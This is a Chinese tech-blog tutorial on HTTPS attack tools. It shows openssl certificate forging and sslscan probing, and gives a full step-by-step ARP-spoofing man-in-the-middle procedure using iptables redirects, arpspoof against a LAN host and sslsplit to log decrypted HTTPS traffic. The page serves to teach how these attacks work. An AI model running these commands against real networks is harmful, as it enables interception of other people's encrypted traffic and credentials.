IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit ) -> 正文阅读

[网络协议]https攻击工具详解(arp欺骗、中间人攻击)(openssl+sslscan+sslsplit )

**

openssl

**
识别ssl的签发单位、证书信息等
可以伪造证书

  • openssl 直接调用openssl库识别目标服务器支持的SSL/TLS(传输层安全)
    -openssl s_client www.taobao.com:443
    在这里插入图片描述
    上图的GlobalSign Organization Validation CA是SSL协议证书的颁发公司
  • openssl s_client -connect 查看证书信息
    openssl s_client -connect www.taobao.com:443
  • openssl s_client -tlsl_2 -cipher “NULL,EXPORT,LOW,DES” 协商低安全级别cipher suite服务器不响应 必须有四到五种加密组合才能构成SSL
    openssl s_client -tlsl_2 -cipher "NULL,EXPORT,LOW,DES" www.baidu.com:443
    在这里插入图片描述
  • openssl ciphers -v "NULL,EXPORT,LOW,DES" 列出已知不安全ciper(加密组合套件)组合
    在这里插入图片描述

openssl伪造证书


第一步先生成私钥(注意生成的位置)
openssl genrsa -out ca.key 2048

2048是长度 大多数证书长度都是2048

第二部生成证书(注意生成的位置)
openssl req -new -x509 -days 1096 -key ca.key -out ca.crt

new是新生成的 509是标准 days是有效时间 key是用那个私钥生成 crt是证书格式

最后下面按照提示填写国家CN 省Shangxi 城市Taiyuan 组织名称 组织单位名字 常用的FQDN名称 邮箱地址

**

sslscan、sysctl、arpspoof 中间人攻击、arp欺骗工具

**

  1. 先解释一下什么是arp欺骗,也就是中间人攻击
  • 首先以太网当中,网络设备之间互相通信用的是mac而不是IP地址 ARP协议就是将IP地址转换成MAC地址的,RARP正好相反。
  • 假设A(192.168.1.2)与B(192.168.1.3)在同一局域网,A要和B实现通信。A首先会发送一个数据包广播到局域网广播地址192.168.1.255(假设),该数据包内包含了源IP(A)、源MAC、目的IP(B)、目的MAC,这个数据包会被发放给局域网中所有的主机,但只有B主机会回复一个包含了源IP(B)、源MAC、目的IP(A)、目的MAC的数据包给A,同时A主机会将返回的这个地址保存在ARP缓存表中。
  • 在ARP缓存表机制存在一个缺陷,就是当请求主机收到ARP应答包后,不会去验证自己是否向对方主机发送过ARP请求包,就直接把这个返回包中的IP地址与MAC地址的对应关系保存进ARP缓存表中,如果原有相同IP对应关系,则原有的会被替换。
  • 双向欺骗,就是双方都骗一次,单向就是只骗一个
  • arp -a可以查看arp缓存表

arp欺骗过程

伪造服务器首先要伪造证书

  1. 启动功能sysctl -w net.ipv4.ip_forward=1
  2. 清空iptables表内信息iptables -t nat -F
  3. 列出iptables表内信息,查看是否为空iptables -t nat -L,不为空则进行第二部清空
  4. 确认端口80和443是否被占用netstat -pantu | grep :80 netstat -pantu | grep :443 如果没有回显则表示没有被占用
  5. 开始写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

-t 使用哪张表
PREROUTING 在路由之前就生效
-p tcp 使用tcp协议
80 REDIRECT 8080将80端口的流量重定向给8080

  1. 写iptables规则iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
  2. 查看iptables表iptables -t nat -L信息
  3. arp欺骗开始arpspoof -i eth0 -t 192.168.72.8 -r 192.168.72.2 -i是网卡,-t是被欺骗的IP,-r是服务器的地址
  4. 查被欺骗主机的arp表,发现mac地址已经改变
  5. 记录被欺骗主机请求信息sslsplit -D -l 1.log -j /root/Desktop/test/ -S /root/Desktop/test/aaa -k /root/Desktop/ca.key -c /root/Desktop/ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

-D 查看debug信息
-l 连接请求过程记录到某个文件
-S请求详细过程记录到某个文件
-k 密钥
-c 证书
ssl 指向8443
tcp指向8080
0.0.0.0谁都可以访问

  1. 现在打开被劫持主机,浏览百度,发现显示不是安全的连接,文件内存在了信息,证明劫持成功
  2. 如果在这个时候,将最早生成的证书导入到被挟持主机上,则不会报错
  3. 报错的原因、、、、

**

sslscan

**

  • 自动识别SSL配置错误、过期协议、过时cipher suite(加密组合套件)和hash算法
  • 默认会检查CRIME、heartblleed漏洞(后者心脏出血漏洞 错误原因:缓冲区过读,即可以读取的数据比英国允许读取的还多)
  • 绿色表示安全,红色黄色需要引起注意

sslscan url 跟下面加参数是一样的结果

-tlsall
sslscan -tlsall www.taobao.com:443
检测TSL有没有漏洞
支持的cipher suite(加密组合套件)算法
DNS解析记录

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-08 22:56:03  更:2022-03-08 22:58:46 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 7:29:45-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码